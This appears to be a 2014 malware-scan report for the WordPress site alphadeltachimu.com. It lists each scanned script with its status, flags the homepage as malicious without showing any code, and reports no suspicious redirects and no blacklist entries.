Scanned pages/files
Request | Server response | Status |
http://alphadeltachimu.com/ | 200 OK Content-Length: 21353 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://alphadeltachimu.com/wp-content/themes/Gabix/js/jquery.min.js | 200 OK Content-Length: 72328 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/comment-reply.js | 200 OK Content-Length: 1276 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/jqueryslidemenu.js | 200 OK Content-Length: 2565 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/shlomb.js | 200 OK Content-Length: 318 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/shorwa.js | 200 OK Content-Length: 321 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/jquery.prettyPhoto.js | 200 OK Content-Length: 23975 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 9716 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/cufon-yui.js | 200 OK Content-Length: 18257 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/ColaborateLight_400.font.js | 200 OK Content-Length: 18611 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/Colaborate-Regular_400.font.js | 200 OK Content-Length: 18635 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/plugins/zero-spam/zero-spam.min.js?ver=1.1.0 | 200 OK Content-Length: 196 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/who-we-are/ | 404 Not Found Content-Length: 1546 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alphadeltachimu.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 06:51:30 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://alphadeltachimu.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: alphadeltachimu.com
Referer: http://www.google.com/search?q=alphadeltachimu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alphadeltachimu.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alphadeltachimu.com/
Result: alphadeltachimu.com is not infected or malware details are not published yet.